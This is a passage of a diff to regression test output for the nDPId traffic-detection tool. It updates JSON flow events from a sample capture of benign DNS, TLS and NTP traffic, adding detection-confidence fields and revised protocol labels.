rasWrQx8flrDgnBIYD1460XCzVYLXxrhZgLoJb3EnAJ7vXCxsY0pXppBEZDDdim91oHmoHdPCYl0He7JYRSbPjtQSoUoTzcJp7PxKyOdGVLYBgNJz7zY+ZgHgZgGwjl0V0nqegEjC35a9y8SnKE63ljmDCyN8pWus5ViXGLvQ2Q\/1YgRAjjfufkIFVVjlXa01yHVzB76HDZ1tJk9CCm9ap34gzfAiHToNIXmogCeGqn2CdKyBeaiMSGkpYWcPn2x5217jPoRlFNQrlxxA+bM2VQvFdzsWSjAthvEYT8M0NKxSkvF5fH3eNJZYaUGLIiBrgIGbm4pAM\/x0xPOGKmtUmoLltnDzmkCbUcHYiWy3Y7nJHL865N2SK80a9Zp+7VINzLRf\/Ervx7NR7ytI7hPsERS2gR+t5ngZO4VMBVWlnWrW+Q0k4Q1KqCHh7RRwRxv5sH62zb+RmG6I1XbjkIiH\/fDv5F+LoUplAhBWHtQdc4gcY6R330O9wWahGV3oVm2bRxt8RZJJruLD1DYhwwT99J89GgAfYqHkYbcpYCi6LHqYqrQ6UmOTNERlSpwcXx4Ujj\/ftQuU3MAdSrHpDwvlJG8V3434OyaQQ78dblNHDOqOcIm3UL5vFVeeu11Ar10lwqpNk+NFgn+2DriZe1BIfTkQZAL4Pitnn2QjlLKFQ="}
 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1626168078676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"ts_msec":1626168078676,"pkt":"8BiYFWV8WNVuaKQACABFAACFmUUAAHgR1vEICAgIwKgBeQA1yx4AcZEiotGBgAABAAEAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAABwAwADAABAABT5QAzDGEyLTIyLTMzLTIzNQZkZXBsb3kGc3RhdGljEmFrYW1haXRlY2hub2xvZ2llcwNjb20A"}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
-00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}}
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}}
+00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}}
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079158,"flow_last_seen":1626168079158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168079158,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1626168079158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168079158,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KaAbvsuitsAAAAALAC\/\/8ZDgAAAgQFtAEDAwYBAQgKPdH+3gAAAAAEAgAA"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079191,"flow_last_seen":1626168079191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168079191,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1626168079191,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168079191,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KbAbvR3yLxAAAAALAC\/\/88QgAAAgQFtAEDAwYBAQgKPdH+\/wAAAAAEAgAA"}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1626168079206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168079206,"pkt":"8BiYFWV8WNVuaKQACABFAAA0JA1AAG0G9PUocQovwKgBeQG70ppkHrV27LorbYAS\/\/90QAAAAgQFoAEDAwgBAQQC"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1626168079207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168079207,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KaAbvsuittZB61d1AQEACk\/wAA"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168079243,"pkt":"8BiYFWV8WNVuaKQACABFAAA0S\/NAAG0GzQ8ocQovwKgBeQG70pvEiS5w0d8i8oAS\/\/++MAAAAgQFoAEDAwgBAQQC"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1626168079243,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KbAbvR3yLyxIkucVAQEADu7wAA"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01381{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
-01381{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1626168079361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168079361,"pkt":"WNVuaKQA8BiYFWV8CABFAABM2zIAAEARlFXAqAF5Ef02+8RwAHsAOAx5IwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"},"ntp": {"request_code":0,"version":0}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1626168079391,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168079391,"pkt":"8BiYFWV8WNVuaKQACABFAABMVlxAADcR4isR\/Tb7wKgBeQB7xHAAOKCnJAED6wAAAAAAAAAMU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mPcazl\/+SX2Y9xr5E6"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079905,"flow_last_seen":1626168079905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168079905,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1626168079905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168079905,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KcAbuMyd8CAAAAALAC\/\/\/ChQAAAgQFtAEDAwYBAQgKPdIBvwAAAAAEAgAA"}
@@ -145,15 +145,15 @@
